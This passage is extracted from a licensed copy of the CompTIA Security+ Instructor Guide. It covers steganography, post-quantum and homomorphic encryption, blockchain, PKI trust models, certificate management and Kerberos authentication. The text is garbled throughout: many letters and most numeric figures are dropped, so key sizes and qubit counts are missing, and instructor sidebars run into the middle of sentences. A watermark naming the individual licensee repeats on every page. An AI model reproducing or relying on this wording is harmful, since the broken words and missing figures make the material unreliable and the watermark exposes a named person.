alse the usages are not e clusive. There are di erent types of cryptography and
some can be used for non repudiation. The principle is that if an encryption method
cipher and key is known only to one person, that person cannot then deny having
composed a message. This depends on the algorithm design allowing recipients to
decrypt the message but not encrypt it.
A complex system might have to support many inputs from devices installed to
potentially unsecure locations. Such a system is resilient if compromise of a small
part of the system is prevented from allowing compromise of the whole system.
Cryptography assists this goal by ensuring the authentication and integrity of messages
delivered over the control system.
3. For which types of system will a cipher suite that exhibits high latency
e pro lematic
igh latency is not desirable in any system really, but it will a ect real time protocols
that e change voice or video most. In network communications, latency makes the
initial protocol handshake longer, meaning delay for users and possible application
timeout issues.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
120 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 5D
Summari e ther
Cryptographic Technologies
Communications
hile uantum computing could put the strength of current cryptographic ciphers
at risk, it also has the promise of underpinning more secure cryptosystems. The
properties of entanglement, superposition, and collapse suit the design of a tamper
evident communication system that would allow secure key agreement.
Post-Quantum
Post-quantum refers to the expected state of computing when quantum computers
that can perform useful tasks are a reality. Currently, the physical properties of ubits
and entanglement make quantum computers very hard to scale up. At the time of
writing, the most powerful uantum computers have about ubits. A uantum
computer will need about a million qubits to run useful applications.
No one can predict with certainty if or when such a computer will be implemented.
In the meantime, NI T is running a pro ect to develop cryptographic ciphers that
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 121
Lightweight Cryptography
Another problem a ecting current cryptographic ciphers is use on low power devices.
NIST is hoping that a compact cipher suite will be be developed that is both quantum
resistant and that can run on battery powered devices with minimal C and memory
resources (csrc.nist.gov pro ects lightweight cryptography).
Homomorphic encryption is principally used to share privacy sensitive data sets. Homomorphic
hen a company collects private data, it is responsible for keeping the data secure and Encryption
respecting the privacy rights of individual data subjects. Companies often want to use
third parties to perform analysis, however. haring unencrypted data in this scenario Teaching
is a significant risk. omomorphic encryption is a solution for this use case because Tip
it allows the receiving company to perform statistical calculations on fields within the e're keeping this
data while keeping the data set as a whole encrypted. or e ample, if you want to here as part of
perform analytics on customer interactions, an analysis tool will be able to sum logons ob ective . , but note
without any account identifiers like email addresses ever being decrypted. that it relates more
to data privacy, which
we'll get to later in the
loc chain course.
Blockchain is a concept in which an expanding list of transactional records is secured Show Slide(s)
using cryptography. Each record is referred to as a block and is run through a hash
function. The hash value of the previous block in the chain is added to the hash lockchain
calculation of the next block in the chain. This ensures that each successive block is
cryptographically linked. ach block validates the hash of the previous block, all the way
through to the beginning of the chain, ensuring that each historical transaction has not
been tampered with. In addition, each block typically includes a timestamp of one or
more transactions, as well as the data involved in the transactions themselves.
The blockchain is recorded in a public ledger. This ledger does not exist as an individual
file on a single computer rather, one of the most important characteristics of a
blockchain is that it is decentrali ed. The ledger is distributed across a peer to peer Show Slide(s)
(P2P) network in order to mitigate the risks associated with having a single point
of failure or compromise. Blockchain users can therefore trust each other equally.
teganography
Likewise, another defining uality of a blockchain is its openness everyone has the
same ability to view every transaction on a blockchain. Teaching
Blockchain technology has a variety of potential applications. It can ensure the integrity Tip
and transparency of financial transactions, online voting systems, identity management There are various
systems, notari ation, data storage, and more. owever, blockchain is still an emerging software applications
technology, and outside of cryptocurrencies, has not yet been adopted on a wide for inserting
and detecting
ranging scale. steganographic
messages. hen
te ano raph hiding messages in
files, a substitution
technique such as
Steganography (literally meaning "hidden writing") is a technique for obscuring the
least significant bit is
presence of a message. Typically, information is embedded where you would not preferable to simply
e pect to find it a message hidden in a picture, for instance. The container document inserting a message
or file is called the covertext. A steganography tool is software that either facilitates this as it does not alter the
file si e.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
122 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
or conversely that can be used to detect the presence of a hidden message within
a coverte t.
hen used to conceal information, steganography amounts to security by obscurity,
which is usually deprecated. owever, a message can be encrypted by some
mechanism before embedding it, providing confidentiality. The technology can also
provide integrity or non repudiation for e ample, it could show that something was
printed on a particular device at a particular time, which could demonstrate that it was
genuine or a fake, depending on conte t.
ne e ample of steganography is to encode messages within TC packet data fields to
create a covert message channel. Another approach is to change the least significant
bit of pi els in an image file. This can code a useful amount of information without
distorting the original image noticeably. Similar techniques can be used with other
media types as cover files, such as audio and video files.
These methods might be used for command and control or to e filtrate data covertly,
bypassing protection mechanisms such as data loss prevention DL blog.trendmicro.
com trendlabs security intelligence steganography and malware concealing code and
cc traffic ). Future developments may see use of steganography in streaming media or
voiceover I oI .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 123
Review Activity:
ther ryptographic Technologies
Answer the following uestions
A threat actor could conceal information within an image file and use that to
bypass the DL system. ne thing to note is that attackers could find other ways to
implement coverte ts audio or video, for instance or abuse protocol coding. There
are many things that steganalysis needs to be able to scan for! You might also note
that steganography is not only a data e filtration risk. It can also be used to smuggle
malicious code into a host system.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
124 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Lesson 5
Summary
Teaching ou should be able to summari e types of cryptographic function hash algorithm,
Tip symmetric cipher, asymmetric cipher and e plain how they are used in hybrid
Check that students encryption products to provide confidentiality, integrity, authentication, and resiliency.
are confident about ou should also be able to identify limitations and weaknesses, plus common types of
the content that has cryptographic attacks. inally, you should be able to summari e other concepts, such as
been covered. If there uantum, blockchain, homomorphic encryption, and steganography.
is time, revisit any
content examples that
they have questions
about. If you have
used all the available
time for this lesson
block, note the issues,
and schedule time for
a review later in the
course.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Lesson 6
Implementing Public Key Infrastructure
• Implement I management.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
126 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 6A
Implement erti cates and
erti cate Authorities
The basic problem with public key cryptography is that you may not really know with
whom you are communicating. The system is vulnerable to man in the middle attacks.
This problem is particularly evident with e commerce. ow can you be sure that a
shopping site or banking service is really maintained by whom it claims The fact that
the site is distributing public keys to secure communications is no guarantee of actual
identity. ow do you know that you are corresponding directly with the site using
its certificate ow can you be sure there isn't a man in the middle intercepting and
modifying what you think the legitimate server is sending you
Public key infrastructure (PKI) aims to prove that the owners of public keys are
who they say they are. nder I, anyone issuing public keys should obtain a digital
certificate. The validity of the certificate is guaranteed by a certificate authority CA .
The validity of the CA can be established using various models.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 127
CA must be trusted by each party. Third party CA services include IdenTrust, Digicert,
ectigo Comodo, oDaddy, and lobal ign. The functions of a CA are as follows
• rovide a range of certificate services useful to the community of users serviced by
the CA.
• nsure the validity of certificates and the identity of those applying for them
registration .
• stablish trust in the CA by users and government and regulatory authorities and
enterprises, such as financial institutions.
• Manage the servers repositories that store and administer the certificates.
icrosoft indows Server CA. (Screenshot used with permission from icrosoft.)
The trust model is a critical I concept, and shows how users and di erent CAs are I Trust Models
able to trust one another.
Teaching
Single CA Tip
mphasi e that there
In this simple model, a single CA issues certificates to users users trust certificates
is not one single
issued by that CA and no other. The problem with this approach is that the single CA hierarchy for all
server is very e posed. If it is compromised, the whole I collapses. Is, and likewise,
there are many root
Hierarchical (Intermediate CA) CAs, one for each
discrete hierarchy.
In the hierarchical model, a single CA called the root issues certificates to several An organi ation can
intermediate CAs. The intermediate CAs issue certificates to sub ects leaf or end have its own root CA
entities . This model has the advantage that di erent intermediate CAs can be set up for its private I, for
e ample.
with di erent certificate policies, enabling users to perceive clearly what a particular
certificate is designed for. ach leaf certificate can be traced back to the root CA along Interaction
the certification path. This is also referred to as certificate chainin , or a chain of trust. Opportunity
The root's certificate is self signed. In the hierarchical model, the root is still a single how a certificate
point of failure. If the root is damaged or compromised, the whole structure collapses. hierarchy for a website
To mitigate against this, however, the root server can be taken o ine, as most of the such as comptia.org .
regular CA activities are handled by the intermediate CA servers.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
128 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Another problem is that there is limited opportunity for cross certification that is, to
trust the CA of another organi ation. Two organi ations could agree to share a root
CA, but this would lead to operational difficulties that could only increase as more
organi ations oin. In practice, most clients are configured to trust multiple root CAs.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 129
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
130 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 131
icrosoft s website certificate configured with alternative sub ect names for different subdomains.
(Screenshot used with permission from icrosoft.)
Listing the specific subdomains is more secure, but if a new subdomain is added, a new
certificate must be issued. A wildcard domain, such as *.comptia.org, means that
the certificate issued to the parent domain will be accepted as valid for all subdomains
to a single level .
CompTIA s website certificate configured with a wildcard domain, allowing access via either https://
comptia.org or https://www.comptia.org. (Screenshot used with permission from icrosoft.)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
132 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Certificate templates for indows Server CA. (Screenshot used with permission from icrosoft.)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 133
omain validation certificate. Only the padlock is shown and the browser reports that the owner is not
verified. (Screenshot used with permission from icrosoft.)
Extended validation certificate from GlobalSign with the verified owner shown in green next to the
padlock. (Screenshot used with permission from GlobalSign, Inc.)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
134 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
e uesting a certificate. The CA has made several user-type certificate templates available with
different key usage specifications (encrypting files, signing emails, encrypting emails, and so on).
(Screenshot used with permission from icrosoft.)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 135
oot Certificate
The root certificate is the one that identifies the CA itself. The root certificate is
self signed. A root certificate would normally use a key si e of at least bits.
Many providers are switching to bits. The CN for a root certificate is set to the
organi ation CA name, such as CompTIA oot CA, rather than an DN.
el si ned Certificates
Any machine, web server, or program code can be deployed with a self-signed
certificate. elf signed certificates will be marked as untrusted by the operating
system or browser, but an administrative user can choose to override this.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
136 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
erti cates and erti cate Authorities
Answer the following uestions
In most cases, the sub ect generates a key pair then adds the public key along with
sub ect information and certificate type in a certificate signing re uest C and
submits it to the CA. If the CA accepts the re uest, it generates a certificate with the
appropriate key usage and validity, signs it, and transmits it to the sub ect.
The sub ect's public key and the algorithms used for encryption and hashing. The
certificate also stores a digital signature from the issuing CA, establishing the chain of
trust.
That the application processing the certificate must be able to interpret the e tension
correctly. therwise, it should re ect the certificate.
A code signing certificate. Certificates are issued for specific purposes. A certificate
issued for one purpose should not be reused for other functions.
The sub ect alternative name AN field. A wildcard certificate will match any
subdomain label.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 137
Topic 6B
Implement PKI Management
Key management refers to operational considerations for the various stages in a key's Certificate and ey
life cycle. A key's life cycle may involve the following stages Management
• ey generation creating a secure key pair of the re uired strength, using the
Teaching
chosen cipher.
Tip
• Certificate generation to identify the public part of a key pair as belonging to a e're focusing
sub ect user or computer , the sub ect submits it for signing by the CA as a digital on public key
certificate with the appropriate key usage. At this point, it is critical to verify the cryptography
here, but do note
identity of the sub ect re uesting the certificate and only issue it if the sub ect that symmetric
passes identity checks. keys and keys
have management
• torage the user must take steps to store the private key securely, ensuring that re uirements too.
unauthori ed access and use is prevented. It is also important to ensure that the e'll be covering
private key is not lost or damaged. later in the course.
• evocation if a private key is compromised, the key pair can be revoked to prevent
users from trusting the public key.
• piration and renewal a key pair that has not been revoked e pires after a certain
period. iving the key or certificate a shelf life increases security. Certificates can
be renewed with new key material.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
138 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Another way to use -of- control is to split a key between several storage devices (such as
three US sticks, any two of which could be used to recreate the full key).
If the key used to decrypt data is lost or damaged, the encrypted data cannot be
recovered unless a backup of the key has been made. A significant problem with key
storage is that if you make multiple backups of a key, it is e ponentially more difficult
to ensure that the key is not compromised. owever, if the key is not backed up, the
storage system represents a single point of failure. ey recovery defines a secure
process for backing up keys and or recovering data encrypted with a lost key. This
process might use M of N control to prevent unauthori ed access to and use of
the archived keys. Escrow means that something is held independently. In terms of
key management, this refers to archiving a key or keys with a third party. This is a
useful solution for organi ations that don't have the capability to store keys securely
themselves, but it invests a great deal of trust in the third party.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 139
C s published by indows Certificate Services The current C contains one revoked certificate.
(Screenshot used with permission from icrosoft.)
ith the C L system, there is a risk that the certificate might be revoked but still
accepted by clients because an up to date C L has not been published. A further
problem is that the browser or other application may not be configured to
perform C L checking, although this now tends to be the case only with legacy
browser software.
Another means of providing up to date information is to check the certificate's status nline Certificate
on an nline Certificate tatus rotocol C server, referred to as an OCSP tatus rotocol
responder. ather than return a whole C L, this ust communicates the status of the esponders
re uested certificate. Details of the C responder service should be published in
the certificate.
ost OCSP servers can uery the certificate database directly and obtain the real-time
status of a certificate. Other OCSP servers actually depend on the C s and are limited by
the C publishing interval.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
140 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
HPKP has serious vulnerabilities and has been deprecated (developer.mozilla.org en-
US docs eb TTP Public ey Pinning). The replacement mechanism is the Certificate
Transparency Framework.
ase6 -encoded .CE file opened in otepad. (Screenshot used with permission from icrosoft.)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 141
ile tensions
A three character file e tension is a convention, not a standard, and unfortunately file
e tensions do not always map cleanly to the type of encoding used within a certificate
file, or even to the contents of a certificate file. The only certain way to check is to open
it in a te t editor.
• oth .D and . M can be used as file e tensions, although the latter is not
recogni ed by indows. . M is the the most widely used e tension for A CII
format files in Linu .
• The .C T and .C e tensions can also be used, but they they are not well
standardi ed. Most of the confusion arises from the way indows handles
certificates. In Linu , .C T is most likely to represent an A CII certificate. In indows,
the most common e tension is .C , but this does not tell you whether the file
format is binary or A CII.
Contents
A certificate file can also contain more than ust a single certificate
• The PKCS #12 format allows the e port of the private key with the certificate. This
would be used either to transfer a private key to a host that could not generate
its own keys, or to back up archive a private key. This type of file format is usually
password protected and always binary. n indows, these usually have a .PFX
e tension, while Mac and i use . . In Linu , the certificate and key are
usually stored in separate files.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
142 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
This example is simplified. Using a root CA to issue leaf certificates directly is not robust. It is
better to create one or more intermediate CAs.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 143
The most common problem when dealing with certificate issues is that of a client Certificate Issues
re ecting a server certificate or slightly less commonly, an authentication server
re ecting a client's certificate . Teaching
• If the problem is with an e isting certificate that has been working previously, check Tip
that the certificate has not e pired or been revoked or suspended. Troubleshooting is no
longer called out on
• If the problem is with a new certificate, check that the key usage settings are the syllabus, so you
may prefer to skip this
appropriate for the application. ome clients, such as N and email clients, have
section. It has been
very specific re uirements for key usage configuration. Also, check that the sub ect retained as general
name is correctly configured and that the client is using the correct address. or implementation detail.
e ample, if a client tries to connect to a server by I address instead of DN, a oint out that
certificate configured with an DN will be re ected. browsers often use a
di erent set of root
• If troubleshooting a new certificate that is correctly configured, check that clients trusts than indows
have been configured with the appropriate chain of trust. ou need to install root itself does.
and intermediate CA certificates on the client before a leaf certificate can be trusted.
e aware that some client applications might maintain a di erent certificate store to
that of the .
• In either case, verify that the time and date settings on the server and client
are synchroni ed. Incorrect date time settings are a common cause of
certificate problems.
rom a security point of view, you must also audit certificate infrastructure to
ensure that only valid certificates are being issued and trusted. eview logs of issued
certificates periodically. alidate the permissions of users assigned to manage
certificate services. Check clients to ensure that only valid root CA certificates are
trusted. Make sure clients are checking for revoked or suspended certificates.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
144 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
PKI Management
Answer the following uestions
It puts both data confidentiality and identification and authentication systems at risk.
Depending on the key usage, the key may be used to decrypt data with authori ation.
The key could also be used to impersonate a user or computer account.
2. You are advising a customer about encryption for data backup security and
the e escro ser ices that ou o er o should ou e plain the ris s o
key escrow and potential mitigations?
Escrow refers to archiving the key used to encrypt the customer's backups with your
company as a third party. The risk is that an insider attack from your company may be
able to decrypt the data backups. This risk can be mitigated by re uiring M of N access
to the escrow keys, reducing the risk of a rogue administrator.
C . . .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 145
Lesson 6
Summary
Teaching
ou should be familiar with the tools and procedures used to issue di erent types of
Tip
certificate and manage I operations.
Check that students
are confident about
uidelines or Implementin u lic e In rastructure the content that has
been covered. If there
ollow these guidelines when you implement public key infrastructure I on a is time, revisit any
private network content e amples that
they have uestions
• Determine whether to use a single CA or intermediate structure and take steps to about. If you have
ensure the security of the root, keeping it o ine if that is operationally possible. used all the available
time for this lesson
• Determine certificate policies and templates that meet the needs of users and block, note the issues
business work ows, such as machine, email user, and code signing certificate and schedule time for
a review later in the
types. nsure that the common name attribute is correctly configured when
course.
issuing certificates.
• Create policies and procedures for users and servers to re uest certificates, plus the
identification, authentication, and authori ation processes to ensure certificates are
only issued to valid sub ects.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Lesson 7
Implementing Authentication Controls
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
148 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 7A
Summarize Authentication
esign oncepts
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 149
IAM enables you to define the attributes that make up an entity's identity, such as its
purpose, function, security clearance, and more. These attributes subse uently enable
access management systems to make informed decisions about whether to grant
or deny an entity access, and if granted, decide what the entity has authori ation to
do. or e ample, an individual employee may have his or her own identity in the IAM
system. The employee's role in the company factors into his or her identity, such as
what department the employee is in and whether the employee is a manager. or
e ample, if you are setting up an e commerce site and want to enroll users, you need
to select the appropriate controls to perform each function
• Identification ensure that customers are legitimate. or e ample, you might need
to ensure that billing and delivery addresses match and that they are not trying to
use fraudulent payment methods.
• Authentication ensure that customers have uni ue accounts and that only they
can manage their orders and billing information.
• Authori ation rules to ensure customers can place orders only when they
have valid payment mechanisms in place. ou might operate loyalty schemes or
promotions that authori e certain customers to view uni ue o ers or content.
• Accounting the system must record the actions a customer takes to ensure that
they cannot deny placing an order, for instance .
The servers and protocols that implement these functions are referred to as
authentication, authorization, and accounting (AAA). The use of IAM to describe
enterprise processes and work ows is becoming more prevalent as the importance of
the identification phase is better acknowledged.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
150 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
A knowledge factor is also used for account reset mechanisms. or e ample, to reset
the password on an account, the user might have to respond to a challenge uestion,
such as, hat is your favorite movie
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 151
certificate or account number. Alternatively, they might have a fob that generates
a uni ue code. These ownership factors can be described as hard tokens.
A device such as a smartphone can also be used to receive a uni uely generated
access code as a soft token. nlike a password, these tokens are valid for only one use,
typically within a brief time window.
Authentication design refers to selecting a technology that meets re uirements for Authentication Design
confidentiality, integrity, and availability
• Confidentiality, in terms of authentication, is critical, because if account credentials
are leaked, threat actors can impersonate the account holder and act on the system
with whatever rights they have.
• Integrity means that the authentication mechanism is reliable and not easy for
threat actors to bypass or trick with counterfeit credentials.
• Availability means that the time taken to authenticate does not impede work ows
and is easy enough for users to operate.
Authentication is used in di erent conte ts and factors are not always well suited
to a conte t. or e ample, you might authenticate to a C by inputting a password
to get access to the device. This might also authenticate you to a network. ut
authentication is also used for physical security. If you consider numerous employees
arriving for work, asking them to type a password to gain access to the building
would take too long and cause huge disruption lack of availability . It is also highly
likely that passwords would be observed lack of confidentiality . inally, it is likely
that users would simply start holding the door open for each other lack of integrity .
Authentication design tries to anticipate these issues and implements a technology that
fits the use case.
An authentication technology is considered strong if it combines the use of more than Multifactor
one type of knowledge, ownership, and biometric factor, and is called multifactor Authentication
authentication (MFA). ingle factor authentication can uite easily be compromised a
password could be written down or shared, a smart card could be lost or stolen, and a Teaching
biometric system could be sub ect to high error rates or spoofing. Tip
e will introduce the
Two- actor Authentication ( A) combines either an ownership based smart card or concept later, but you
biometric identifier with something you know, such as a password or IN. Three factor might want to mention
authentication combines all three technologies, or incorporates an additional attribute, step verification
such as location for e ample, a smart card with integrated fingerprint reader. This here, to contrast with
means that to authenticate, the user must possess the card, the user's fingerprint must M A.
match the template stored on the card, and the user must input a IN or password.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
152 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 153
Review Activity:
Authentication Design Concepts
Answer the following uestions
Authorization means granting the account that has been configured for the user on
the computer system the right to make use of a resource. Authori ation manages
the privileges granted on the resource. Authentication protects the validity of the user
account by testing that the person accessing that account is who she he says she he is.
erform checks to confirm the user's identity, issue authentication credentials securely,
assign appropriate permissions privileges to the account, and ensure accounting
mechanisms to audit the user's activity.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
154 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 7B
Implement Knowledge-Based
Authentication
Windows Authentication
indows authentication involves a comple architecture of components docs.
microsoft.com en us windows server security windows authentication credentials
processes in windows authentication , but the following three scenarios are typical
• indows local sign in the Local ecurity Authority L A compares the submitted
credential to a hash stored in the ecurity Accounts Manager AM database, which
is part of the registry. This is also referred to as interactive logon.
• indows network sign in the L A can pass the credentials for authentication to
a network service. The preferred system for network authentication is based on
erberos, but legacy network applications might use NT LAN Manager (NTLM)
authentication.
• emote sign in if the user's device is not connected to the local network,
authentication can take place over some type of virtual private network N or
web portal.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 155
Linux Authentication
In Linu , local user account names are stored in /etc/passwd. hen a user logs
in to a local interactive shell, the password is checked against a hash stored in /etc/
shadow. Interactive login over a network is typically accomplished using ecure hell
. ith , the user can be authenticated using cryptographic keys instead of a
password.
A plu a le authentication module A is a package for enabling di erent
authentication providers, such as smart card login tecmint.com configure pam
in centos ubuntu linu . The AM framework can also be used to implement
authentication to network servers.
Kerberos is a single sign on network authentication and authori ation protocol used erberos
on many networks, notably as implemented by Microsoft's Active Directory AD Authentication
service. erberos was named after the three headed guard dog of ades Cerberus
because it consists of three parts. Clients re uest services from application servers, Teaching
which both rely on an intermediary a Key Distribution Center (KDC) to vouch for Tip
their identity. There are two services that make up a DC the Authentication ervice erberos can be
and the Ticket ranting ervice. The DC runs on port using TC or D . difficult to follow, with
multiple use of secret
and session keys from
di erent sources.
tress the main point
that erberos provides
single sign on through
the use of tickets or
tokens.
Note the use of
time stamping to
defeat replay attacks
and the use of
symmetric, rather
than asymmetric,
encryption i.e.,
contrast erberos with
I.
Teaching
Tip
The server can decrypt
erberos Authentication Service. (Images 1 .com.) the re uest because
it holds a copy of the
user's password hash.
The Authentication ervice is responsible for authenticating user logon re uests. More This shows that the
generally, users and services can be authenticated these are collectively referred to user has entered the
as principals. or e ample, when you sit at a indows domain workstation and log correct password and
on to a realm or domain , the first step of logon is to authenticate with a DC server, that the system time
implemented as a domain controller. is valid.
1. The client sends the authentication service A a re uest for a Ticket Granting
Ticket (TGT). This is composed by encrypting the date and time on the local
computer with the user's password hash as the key.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
156 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
The password hash itself is not transmitted over the network. Also, although we refer
to passwords for simplicity, the system can use other authentication providers, such as
smart-card logon.
The Ticket Granting Ticket (TGT or user ticket) is time-stamped (under indows, they have
a default maximum age of 10 hours). This means that workstations and servers on the
network must be synchronized (to within five minutes) or a ticket will be re ected. This helps
prevent replay attacks.
2. The A checks that the user account is present, that it can decode the re uest by
matching the user's password hash with the one in the Active Directory database,
and that the re uest has not e pired. If the re uest is valid, the A responds with
the following data
• Ticket ranting Ticket T T this contains information about the client name
and I address plus a timestamp and validity period. This is encrypted using
the DC's secret key.
• T session key for use in communications between the client and the Ticket
ranting ervice T . This is encrypted using a hash of the user's password.
The T T is an e ample of a logical token. All the T T does is identify who you are and
confirm that you have been authenticated it does not provide you with access to any
domain resources.
The T should be able to decrypt both messages using the DC's secret key for
the first and the T session key for the second. This confirms that the re uest
is genuine. It also checks that the ticket has not e pired and has not been used
before replay attack .
• ervice session key for use between the client and the application server.
This is encrypted with the T session key.
4. The client forwards the service ticket, which it cannot decrypt, to the application
server and adds another time stamped authenticator, which is encrypted using
the service session key.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 157
5. The application server decrypts the service ticket to obtain the service session
key using its secret key, confirming that the client has sent it an untampered
message. It then decrypts the authenticator using the service session key.
6. ptionally, the application server responds to the client with the timestamp used
in the authenticator, which is encrypted by using the service session key. The
client decrypts the timestamp and verifies that it matches the value already sent,
and concludes that the application server is trustworthy.
Show Slide(s)
This means that the server is authenticated to the client referred to as mutual
authentication . This prevents a man in the middle attack, where a malicious user A , C A , and M
could intercept communications between the client and server. C A Authentication
7. The server now responds to client re uests assuming they conform to the Teaching
server's access control list . Tip
ven though there
The data transfer itself is not encrypted (at least as part of erberos some sort of transport aren't too many
encryption can be deployed). scenarios where either
C A or A are
chosen these days,
remind students that
some e am uestions
ne of the noted drawbacks of erberos is that the DC represents a single point
might not re ect
of failure for the network. In practice, backup DC servers can be implemented for the legacy nature of
e ample, Active Directory supports multiple domain controllers, each of which are some technologies.
running the DC service . These protocols can
be deployed more or
less securely within an
A C A and C A Authentication encrypted tunnel L
or , for instance .
erberos is designed to work over a trusted local network. everal authentication The idea here is that
protocols have been developed to work with remote access protocols, where the you use I certificates
connection is made over a serial link or virtual private network N. for machine
authentication,
then perform user
ass ord Authentication rotocol A authentication
through the secure
The ass ord Authentication rotocol A is an unsophisticated authentication tunnel. ee the topic
method developed as part of the oint to oint rotocol , used to transfer TC on A .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
158 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
I data over serial or dial up connections. It is also used as the basic authentication
mechanism in TT . It relies on clear te t password e change and is therefore obsolete
for most purposes, e cept through an encrypted tunnel.
2. esponse the client responds with a hash calculated from the server challenge
message and client password or other shared secret .
3. erification the server performs its own hash using the password hash stored
for the client. If it matches the response, then access is granted otherwise, the
connection is dropped.
The handshake is repeated with a di erent challenge message periodically during the
connection although transparent to the user . This guards against replay attacks, in
which a previous session could be captured and reused to gain access.
C A is Microsoft's implementation of C A . ecause of the way it uses
vulnerable NTLM hashes, M C A should not be deployed without the protection of a
secure connection tunnel so that the credentials being passed are encrypted.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 159
hen a user chooses a password, the password is converted to a hash using a assword Attacks
cryptographic function, such as MD or A. This means that, in theory, no one
e cept the user not even the system administrator knows the password, because the Teaching
plainte t should not be recoverable from the hash. Tip
The best defense
lainte t nencr pted Attac s against password
crackers is to ensure
A plaintext unencrypted attack e ploits password storage or a network authentication the use of strong
protocol that does not use encryption. amples include A , basic TT T passwords and not
authentication, and Telnet. These protocols must not be used. asswords must to use clear te t
protocols, of course .
never be saved to an unmanaged file. ne common source of credential breaches is
ou must also restrict
passwords embedded in application code that has subse uently been uploaded to a access to password
public repository. databases carefully
to try to prevent any
